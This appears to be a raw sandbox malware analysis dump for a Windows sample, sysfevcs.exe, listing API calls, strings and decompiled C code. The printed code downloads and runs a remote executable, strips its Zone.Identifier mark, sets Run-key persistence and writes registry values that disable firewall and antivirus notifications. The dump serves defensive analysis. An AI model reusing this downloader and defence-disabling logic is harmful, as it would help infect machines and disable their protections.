                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00405f39
                                                                                                                                                                                                                                                                  0x00405d6d
                                                                                                                                                                                                                                                                  0x00405d93
                                                                                                                                                                                                                                                                  0x00405e1e
                                                                                                                                                                                                                                                                  0x00405e25
                                                                                                                                                                                                                                                                  0x00405e2a
                                                                                                                                                                                                                                                                  0x00405e33
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00405e37
                                                                                                                                                                                                                                                                  0x00405e37
                                                                                                                                                                                                                                                                  0x00405d9f
                                                                                                                                                                                                                                                                  0x00405dae
                                                                                                                                                                                                                                                                  0x00405db4
                                                                                                                                                                                                                                                                  0x00405dbd
                                                                                                                                                                                                                                                                  0x00405dc4
                                                                                                                                                                                                                                                                  0x00405dcb
                                                                                                                                                                                                                                                                  0x00405de3
                                                                                                                                                                                                                                                                  0x00405e0b
                                                                                                                                                                                                                                                                  0x00405e18
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00405e18
                                                                                                                                                                                                                                                                  0x00405d0a
                                                                                                                                                                                                                                                                  0x00405d0a
                                                                                                                                                                                                                                                                  0x00405c96
                                                                                                                                                                                                                                                                  0x00405c9c
                                                                                                                                                                                                                                                                  0x00405ca0
                                                                                                                                                                                                                                                                  0x00405ca7
                                                                                                                                                                                                                                                                  0x00405cb1
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00405cb3
                                                                                                                                                                                                                                                                  0x00405cba
                                                                                                                                                                                                                                                                  0x00405cc9
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00405cc9
                                                                                                                                                                                                                                                                  0x00405cd7
                                                                                                                                                                                                                                                                  0x00405cd9
                                                                                                                                                                                                                                                                  0x00405cdc
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00405cdc
                                                                                                                                                                                                                                                                  0x00405be0

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(000007D0), ref: 00405B4E
                                                                                                                                                                                                                                                                  • PathFileExistsW.KERNELBASE(2596396235629365635), ref: 00405B7B
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(246266396537), ref: 00405B8A
                                                                                                                                                                                                                                                                  • DeleteFileA.KERNEL32(2352338747374), ref: 00405B95
                                                                                                                                                                                                                                                                  • MoveFileA.KERNEL32 ref: 00405BA5
                                                                                                                                                                                                                                                                  • CreateMutexA.KERNELBASE(00000000,00000000,5858874), ref: 00405BC5
                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 00405BD1
                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00405BE0
                                                                                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,C:\Windows\sysfevcs.exe,00000105), ref: 00405C06
                                                                                                                                                                                                                                                                  • PathFindFileNameW.SHLWAPI(C:\Windows\sysfevcs.exe), ref: 00405C11
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00405C2E
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNELBASE(?), ref: 00405C3E
                                                                                                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00405C55
                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00405D0A
                                                                                                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%windir%,?,00000104), ref: 00405D21
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00405D3F
                                                                                                                                                                                                                                                                  • CopyFileW.KERNEL32(C:\Windows\sysfevcs.exe,?,00000000), ref: 00405D56
                                                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000003), ref: 00405D6D
                                                                                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,00020006,00000000), ref: 00405D8B
                                                                                                                                                                                                                                                                  • RegSetValueExW.ADVAPI32(00000000,Windows Settings,00000000,00000001,?,?), ref: 00405E0B
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00405E18
                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00405E37
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000001F4), ref: 00405E42
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 00405E60
                                                                                                                                                                                                                                                                  • CopyFileW.KERNEL32(C:\Windows\sysfevcs.exe,?,00000000), ref: 00405E77
                                                                                                                                                                                                                                                                  • SetFileAttributesW.KERNEL32(?,00000003), ref: 00405E8E
                                                                                                                                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(80000001,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,00020006,00000000), ref: 00405EAC
                                                                                                                                                                                                                                                                  • RegSetValueExW.ADVAPI32(00000000,Windows Settings,00000000,00000001,?,?), ref: 00405F2C
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00405F39
                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00405F58
                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(000001F4), ref: 00405F63
                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Microsoft\Security Center,00000000,00020006,00000000), ref: 00405F81
                                                                                                                                                                                                                                                                  • RegSetValueExA.KERNELBASE(00000000,FirewallOverride,00000000,00000004,00000001,00000004), ref: 00405FA8
                                                                                                                                                                                                                                                                  • RegSetValueExA.KERNELBASE(00000000,FirewallDisableNotify,00000000,00000004,00000001,00000004), ref: 00405FC7
                                                                                                                                                                                                                                                                  • RegSetValueExA.KERNELBASE(00000000,AntiSpywareOverride,00000000,00000004,00000001,00000004), ref: 00405FE6
                                                                                                                                                                                                                                                                  • RegSetValueExA.KERNELBASE(00000000,AntiVirusOverride,00000000,00000004,00000001,00000004), ref: 00406005
                                                                                                                                                                                                                                                                  • RegSetValueExA.KERNELBASE(00000000,AntiVirusDisableNotify,00000000,00000004,00000001,00000004), ref: 00406024
                                                                                                                                                                                                                                                                  • RegSetValueExA.KERNELBASE(00000000,UpdatesOverride,00000000,00000004,00000001,00000004), ref: 00406043
                                                                                                                                                                                                                                                                  • RegSetValueExA.KERNELBASE(00000000,UpdatesDisableNotify,00000000,00000004,00000001,00000004), ref: 00406062
                                                                                                                                                                                                                                                                  • RegCloseKey.KERNELBASE(00000000), ref: 0040606F
                                                                                                                                                                                                                                                                  • RegOpenKeyExA.KERNELBASE(80000002,SOFTWARE\Microsoft\Security Center\Svc,00000000,00020006,00000000), ref: 0040608D
                                                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(00000000,FirewallOverride,00000000,00000004,00000001,00000004), ref: 004060B4
                                                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(00000000,FirewallDisableNotify,00000000,00000004,00000001,00000004), ref: 004060D3
                                                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiSpywareOverride,00000000,00000004,00000001,00000004), ref: 004060F2
                                                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiVirusOverride,00000000,00000004,00000001,00000004), ref: 00406111
                                                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(00000000,AntiVirusDisableNotify,00000000,00000004,00000001,00000004), ref: 00406130
                                                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(00000000,UpdatesOverride,00000000,00000004,00000001,00000004), ref: 0040614F
                                                                                                                                                                                                                                                                  • RegSetValueExA.ADVAPI32(00000000,UpdatesDisableNotify,00000000,00000004,00000001,00000004), ref: 0040616E
                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 0040617B
                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(000001F4), ref: 00406186
                                                                                                                                                                                                                                                                  • WSAStartup.WS2_32(00000202,?), ref: 004061A8
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 004061BF
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 004061D9
                                                                                                                                                                                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,00404120,00000000,00000000,00000000), ref: 004061F1
                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(000003E8), ref: 004061FC
                                                                                                                                                                                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,004051D0,00000000,00000000,00000000), ref: 00406211
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040621C
                                                                                                                                                                                                                                                                  • CreateThread.KERNELBASE(00000000,00000000,00405A20,00000000,00000000,00000000), ref: 00406231
                                                                                                                                                                                                                                                                  • Sleep.KERNELBASE(00002710), ref: 0040623C
                                                                                                                                                                                                                                                                  • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00406259
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484622220.000000000040F000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484629337.0000000000412000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_sysfevcs.jbxd
                                                                                                                                                                                                                                                                  Yara matches
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Value$File$Sleep$Createwsprintf$CloseExitOpenProcess$DeleteThread$AttributesCopyEnvironmentExpandNamePathStrings$ErrorEventExistsFindLastModuleMoveMutexStartup
                                                                                                                                                                                                                                                                  • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\tbcmds.dat$%s\tbnds.dat$%userprofile%$%windir%$2346836423674$2352338747374$246266396537$2596396235629365635$2959359672365276$5858874$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$C:\Users\user\tbcmds.dat$C:\Users\user\tbnds.dat$C:\Windows\sysfevcs.exe$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$sysfevcs.exe$+A
                                                                                                                                                                                                                                                                  • API String ID: 2159060516-2964551004
                                                                                                                                                                                                                                                                  • Opcode ID: 5af27161dfb52bd25de4fd10cf49f6bff65a2c7e3f0f3f5bc0b704609d2f10af
                                                                                                                                                                                                                                                                  • Instruction ID: 92e1a68c9bc006c386a89a388cf1530c15af291c072a27ad18b719b30f1901aa
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 5af27161dfb52bd25de4fd10cf49f6bff65a2c7e3f0f3f5bc0b704609d2f10af
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B2123EB1A80318ABE7309B50DD4AF997778EB44B04F5081B5F309BA1D1D7B46A84CF5D
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  C-Code - Quality: 83%
                                                                                                                                                                                                                                                                  			E0040D210(char* _a4, signed int _a8) {
                                                                                                                                                                                                                                                                  				short _v524;
                                                                                                                                                                                                                                                                  				short _v1044;
                                                                                                                                                                                                                                                                  				signed char _v1045;
                                                                                                                                                                                                                                                                  				short _v1572;
                                                                                                                                                                                                                                                                  				void* _v1576;
                                                                                                                                                                                                                                                                  				void* _v1580;
                                                                                                                                                                                                                                                                  				short _v2100;
                                                                                                                                                                                                                                                                  				void _v2364;
                                                                                                                                                                                                                                                                  				long _v2368;
                                                                                                                                                                                                                                                                  				long _v2372;
                                                                                                                                                                                                                                                                  				void* _v2376;
                                                                                                                                                                                                                                                                  				intOrPtr* _v2380;
                                                                                                                                                                                                                                                                  				intOrPtr _v2384;
                                                                                                                                                                                                                                                                  				char _v2385;
                                                                                                                                                                                                                                                                  				intOrPtr _v2392;
                                                                                                                                                                                                                                                                  				signed int _t88;
                                                                                                                                                                                                                                                                  				signed int _t90;
                                                                                                                                                                                                                                                                  				int _t96;
                                                                                                                                                                                                                                                                  				signed int _t97;
                                                                                                                                                                                                                                                                  				signed int _t99;
                                                                                                                                                                                                                                                                  				signed int _t101;
                                                                                                                                                                                                                                                                  				signed int _t111;
                                                                                                                                                                                                                                                                  				void* _t112;
                                                                                                                                                                                                                                                                  				void* _t115;
                                                                                                                                                                                                                                                                  				int _t119;
                                                                                                                                                                                                                                                                  				signed char _t125;
                                                                                                                                                                                                                                                                  				signed char _t127;
                                                                                                                                                                                                                                                                  				void* _t181;
                                                                                                                                                                                                                                                                  				void* _t182;
                                                                                                                                                                                                                                                                  				void* _t184;
                                                                                                                                                                                                                                                                  
                                                                                                                                                                                                                                                                  				srand(GetTickCount());
                                                                                                                                                                                                                                                                  				_t182 = _t181 + 4;
                                                                                                                                                                                                                                                                  				_v1045 = 0;
                                                                                                                                                                                                                                                                  				ExpandEnvironmentStringsW(L"%temp%",  &_v2100, 0x104);
                                                                                                                                                                                                                                                                  				_v2380 = _a4;
                                                                                                                                                                                                                                                                  				_v2384 = _v2380 + 1;
                                                                                                                                                                                                                                                                  				do {
                                                                                                                                                                                                                                                                  					_v2385 =  *_v2380;
                                                                                                                                                                                                                                                                  					_v2380 = _v2380 + 1;
                                                                                                                                                                                                                                                                  				} while (_v2385 != 0);
                                                                                                                                                                                                                                                                  				_v2392 = _v2380 - _v2384;
                                                                                                                                                                                                                                                                  				mbstowcs( &_v1044, _a4, _v2392 + 1);
                                                                                                                                                                                                                                                                  				_t88 = rand();
                                                                                                                                                                                                                                                                  				asm("cdq");
                                                                                                                                                                                                                                                                  				_t90 = rand();
                                                                                                                                                                                                                                                                  				asm("cdq");
                                                                                                                                                                                                                                                                  				wsprintfW( &_v1572, L"%s\\%d%d.exe",  &_v2100, _t90 % 0x7fff + 0x3e8, _t88 % 0x7fff + 0x3e8);
                                                                                                                                                                                                                                                                  				_t184 = _t182 + 0x20;
                                                                                                                                                                                                                                                                  				_v2376 = InternetOpenW(L"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36", 0, 0, 0, 0);
                                                                                                                                                                                                                                                                  				if(_v2376 != 0) {
                                                                                                                                                                                                                                                                  					_t112 = InternetOpenUrlW(_v2376,  &_v1044, 0, 0, 0, 0); // executed
                                                                                                                                                                                                                                                                  					_v1576 = _t112;
                                                                                                                                                                                                                                                                  					if(_v1576 != 0) {
                                                                                                                                                                                                                                                                  						_t115 = CreateFileW( &_v1572, 0x40000000, 0, 0, 2, 0, 0); // executed
                                                                                                                                                                                                                                                                  						_v1580 = _t115;
                                                                                                                                                                                                                                                                  						if(_v1580 != 0xffffffff) {
                                                                                                                                                                                                                                                                  							while(1) {
                                                                                                                                                                                                                                                                  								_t119 = InternetReadFile(_v1576,  &_v2364, 0x103,  &_v2372); // executed
                                                                                                                                                                                                                                                                  								if(_t119 == 0 || _v2372 == 0) {
                                                                                                                                                                                                                                                                  									break;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  								WriteFile(_v1580,  &_v2364, _v2372,  &_v2368, 0); // executed
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  							CloseHandle(_v1580);
                                                                                                                                                                                                                                                                  							wsprintfW( &_v524, L"%s:Zone.Identifier",  &_v1572);
                                                                                                                                                                                                                                                                  							DeleteFileW( &_v524); // executed
                                                                                                                                                                                                                                                                  							Sleep(0x3e8);
                                                                                                                                                                                                                                                                  							_t125 = E0040CEF0( &_v1572); // executed
                                                                                                                                                                                                                                                                  							_t184 = _t184 + 0x10;
                                                                                                                                                                                                                                                                  							if((_t125 & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                  								DeleteFileW( &_v1572);
                                                                                                                                                                                                                                                                  							} else {
                                                                                                                                                                                                                                                                  								Sleep(0x7d0);
                                                                                                                                                                                                                                                                  								_t127 = E0040D0B0( &_v1572); // executed
                                                                                                                                                                                                                                                                  								_t184 = _t184 + 4;
                                                                                                                                                                                                                                                                  								if((_t127 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                  									if((_a8 & 0x000000ff) == 1) {
                                                                                                                                                                                                                                                                  										ExitProcess(0); // executed
                                                                                                                                                                                                                                                                  									}
                                                                                                                                                                                                                                                                  									_v1045 = 1;
                                                                                                                                                                                                                                                                  								}
                                                                                                                                                                                                                                                                  							}
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						CloseHandle(_v1580);
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  					InternetCloseHandle(_v1576);
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				InternetCloseHandle(_v2376);
                                                                                                                                                                                                                                                                  				Sleep(0x3e8);
                                                                                                                                                                                                                                                                  				_t96 = _v1045 & 0x000000ff;
                                                                                                                                                                                                                                                                  				if(_t96 == 0) {
                                                                                                                                                                                                                                                                  					_t97 = rand();
                                                                                                                                                                                                                                                                  					asm("cdq");
                                                                                                                                                                                                                                                                  					Sleep(0x1388 + _t97 % 0xea60 * 5);
                                                                                                                                                                                                                                                                  					_t99 = rand();
                                                                                                                                                                                                                                                                  					asm("cdq");
                                                                                                                                                                                                                                                                  					_t101 = rand();
                                                                                                                                                                                                                                                                  					asm("cdq");
                                                                                                                                                                                                                                                                  					_t96 = wsprintfW( &_v1572, L"%s\\%d%d.exe",  &_v2100, _t101 % 0x7fff + 0x3e8, _t99 % 0x7fff + 0x3e8);
                                                                                                                                                                                                                                                                  					_push(0);
                                                                                                                                                                                                                                                                  					_push(0);
                                                                                                                                                                                                                                                                  					_push( &_v1572);
                                                                                                                                                                                                                                                                  					_push( &_v1044);
                                                                                                                                                                                                                                                                  					_push(0);
                                                                                                                                                                                                                                                                  					L0040E9D2();
                                                                                                                                                                                                                                                                  					if(_t96 == 0) {
                                                                                                                                                                                                                                                                  						wsprintfW( &_v524, L"%s:Zone.Identifier",  &_v1572);
                                                                                                                                                                                                                                                                  						DeleteFileW( &_v524);
                                                                                                                                                                                                                                                                  						Sleep(0x3e8);
                                                                                                                                                                                                                                                                  						if((E0040CEF0( &_v1572) & 0x000000ff) == 0) {
                                                                                                                                                                                                                                                                  							return DeleteFileW( &_v1572);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  						Sleep(0x7d0);
                                                                                                                                                                                                                                                                  						_t111 = E0040D0B0( &_v1572) & 0x000000ff;
                                                                                                                                                                                                                                                                  						if(_t111 == 0 || (_a8 & 0x000000ff) != 1) {
                                                                                                                                                                                                                                                                  							return _t111;
                                                                                                                                                                                                                                                                  						} else {
                                                                                                                                                                                                                                                                  							ExitProcess(0);
                                                                                                                                                                                                                                                                  						}
                                                                                                                                                                                                                                                                  					}
                                                                                                                                                                                                                                                                  				}
                                                                                                                                                                                                                                                                  				return _t96;
                                                                                                                                                                                                                                                                  			}

































                                                                                                                                                                                                                                                                  0x0040d220
                                                                                                                                                                                                                                                                  0x0040d225
                                                                                                                                                                                                                                                                  0x0040d228
                                                                                                                                                                                                                                                                  0x0040d240
                                                                                                                                                                                                                                                                  0x0040d249
                                                                                                                                                                                                                                                                  0x0040d258
                                                                                                                                                                                                                                                                  0x0040d25e
                                                                                                                                                                                                                                                                  0x0040d266
                                                                                                                                                                                                                                                                  0x0040d26c
                                                                                                                                                                                                                                                                  0x0040d273
                                                                                                                                                                                                                                                                  0x0040d288
                                                                                                                                                                                                                                                                  0x0040d2a3
                                                                                                                                                                                                                                                                  0x0040d2ab
                                                                                                                                                                                                                                                                  0x0040d2b0
                                                                                                                                                                                                                                                                  0x0040d2bf
                                                                                                                                                                                                                                                                  0x0040d2c4
                                                                                                                                                                                                                                                                  0x0040d2e6
                                                                                                                                                                                                                                                                  0x0040d2ec
                                                                                                                                                                                                                                                                  0x0040d302
                                                                                                                                                                                                                                                                  0x0040d30f
                                                                                                                                                                                                                                                                  0x0040d32b
                                                                                                                                                                                                                                                                  0x0040d331
                                                                                                                                                                                                                                                                  0x0040d33e
                                                                                                                                                                                                                                                                  0x0040d35a
                                                                                                                                                                                                                                                                  0x0040d360
                                                                                                                                                                                                                                                                  0x0040d36d
                                                                                                                                                                                                                                                                  0x0040d373
                                                                                                                                                                                                                                                                  0x0040d38d
                                                                                                                                                                                                                                                                  0x0040d395
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d3be
                                                                                                                                                                                                                                                                  0x0040d3be
                                                                                                                                                                                                                                                                  0x0040d3cd
                                                                                                                                                                                                                                                                  0x0040d3e6
                                                                                                                                                                                                                                                                  0x0040d3f6
                                                                                                                                                                                                                                                                  0x0040d401
                                                                                                                                                                                                                                                                  0x0040d40e
                                                                                                                                                                                                                                                                  0x0040d413
                                                                                                                                                                                                                                                                  0x0040d41b
                                                                                                                                                                                                                                                                  0x0040d460
                                                                                                                                                                                                                                                                  0x0040d41d
                                                                                                                                                                                                                                                                  0x0040d422
                                                                                                                                                                                                                                                                  0x0040d42f
                                                                                                                                                                                                                                                                  0x0040d434
                                                                                                                                                                                                                                                                  0x0040d43d
                                                                                                                                                                                                                                                                  0x0040d446
                                                                                                                                                                                                                                                                  0x0040d44a
                                                                                                                                                                                                                                                                  0x0040d44a
                                                                                                                                                                                                                                                                  0x0040d450
                                                                                                                                                                                                                                                                  0x0040d450
                                                                                                                                                                                                                                                                  0x0040d457
                                                                                                                                                                                                                                                                  0x0040d41b
                                                                                                                                                                                                                                                                  0x0040d46d
                                                                                                                                                                                                                                                                  0x0040d46d
                                                                                                                                                                                                                                                                  0x0040d47a
                                                                                                                                                                                                                                                                  0x0040d47a
                                                                                                                                                                                                                                                                  0x0040d487
                                                                                                                                                                                                                                                                  0x0040d492
                                                                                                                                                                                                                                                                  0x0040d498
                                                                                                                                                                                                                                                                  0x0040d4a1
                                                                                                                                                                                                                                                                  0x0040d4a7
                                                                                                                                                                                                                                                                  0x0040d4ac
                                                                                                                                                                                                                                                                  0x0040d4be
                                                                                                                                                                                                                                                                  0x0040d4c4
                                                                                                                                                                                                                                                                  0x0040d4c9
                                                                                                                                                                                                                                                                  0x0040d4d8
                                                                                                                                                                                                                                                                  0x0040d4dd
                                                                                                                                                                                                                                                                  0x0040d4ff
                                                                                                                                                                                                                                                                  0x0040d508
                                                                                                                                                                                                                                                                  0x0040d50a
                                                                                                                                                                                                                                                                  0x0040d512
                                                                                                                                                                                                                                                                  0x0040d519
                                                                                                                                                                                                                                                                  0x0040d51a
                                                                                                                                                                                                                                                                  0x0040d51c
                                                                                                                                                                                                                                                                  0x0040d523
                                                                                                                                                                                                                                                                  0x0040d53c
                                                                                                                                                                                                                                                                  0x0040d54c
                                                                                                                                                                                                                                                                  0x0040d557
                                                                                                                                                                                                                                                                  0x0040d571
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d5ae
                                                                                                                                                                                                                                                                  0x0040d578
                                                                                                                                                                                                                                                                  0x0040d58d
                                                                                                                                                                                                                                                                  0x0040d592
                                                                                                                                                                                                                                                                  0x00000000
                                                                                                                                                                                                                                                                  0x0040d59d
                                                                                                                                                                                                                                                                  0x0040d59f
                                                                                                                                                                                                                                                                  0x0040d59f
                                                                                                                                                                                                                                                                  0x0040d592
                                                                                                                                                                                                                                                                  0x0040d523
                                                                                                                                                                                                                                                                  0x0040d5b7

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 0040D219
                                                                                                                                                                                                                                                                  • srand.MSVCRT ref: 0040D220
                                                                                                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040D240
                                                                                                                                                                                                                                                                  • mbstowcs.NTDLL ref: 0040D2A3
                                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 0040D2AB
                                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 0040D2BF
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 0040D2E6
                                                                                                                                                                                                                                                                  • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040D2FC
                                                                                                                                                                                                                                                                  • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040D32B
                                                                                                                                                                                                                                                                  • CreateFileW.KERNELBASE(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040D35A
                                                                                                                                                                                                                                                                  • InternetReadFile.WININET(00000000,?,00000103,?), ref: 0040D38D
                                                                                                                                                                                                                                                                  • WriteFile.KERNELBASE(000000FF,?,00000000,?,00000000), ref: 0040D3BE
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040D3CD
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 0040D3E6
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNELBASE(?), ref: 0040D3F6
                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040D44A
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000007D0), ref: 0040D422
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D0B0: memset.NTDLL ref: 0040D0BE
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D0B0: CreateProcessW.KERNELBASE ref: 0040D105
                                                                                                                                                                                                                                                                    • Part of subcall function 0040D0B0: Sleep.KERNEL32(000003E8), ref: 0040D115
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 0040D460
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(000000FF), ref: 0040D46D
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040D47A
                                                                                                                                                                                                                                                                  • InternetCloseHandle.WININET(00000000), ref: 0040D487
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040D492
                                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 0040D4A7
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32 ref: 0040D4BE
                                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 0040D4C4
                                                                                                                                                                                                                                                                  • rand.MSVCRT ref: 0040D4D8
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 0040D4FF
                                                                                                                                                                                                                                                                  • URLDownloadToFileW.URLMON(00000000,?,?,00000000,00000000), ref: 0040D51C
                                                                                                                                                                                                                                                                  • wsprintfW.USER32 ref: 0040D53C
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 0040D54C
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040D557
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0040D401
                                                                                                                                                                                                                                                                    • Part of subcall function 0040CEF0: CreateFileW.KERNELBASE(00000000,80000000,00000000,00000000,00000003,00000000,00000000), ref: 0040CF24
                                                                                                                                                                                                                                                                    • Part of subcall function 0040CEF0: CreateFileMappingW.KERNELBASE(000000FF,00000000,00000002,00000000,00000000,00000000), ref: 0040CF45
                                                                                                                                                                                                                                                                    • Part of subcall function 0040CEF0: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000000), ref: 0040CF64
                                                                                                                                                                                                                                                                    • Part of subcall function 0040CEF0: GetFileSize.KERNEL32(000000FF,00000000), ref: 0040CF7D
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(000007D0), ref: 0040D578
                                                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 0040D59F
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?), ref: 0040D5AE
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • %s:Zone.Identifier, xrefs: 0040D3DA
                                                                                                                                                                                                                                                                  • %temp%, xrefs: 0040D23B
                                                                                                                                                                                                                                                                  • %s\%d%d.exe, xrefs: 0040D2DA
                                                                                                                                                                                                                                                                  • %s\%d%d.exe, xrefs: 0040D4F3
                                                                                                                                                                                                                                                                  • %s:Zone.Identifier, xrefs: 0040D530
                                                                                                                                                                                                                                                                  • Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36, xrefs: 0040D2F7
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000001.00000002.484609930.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 00000001.00000002.484603911.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
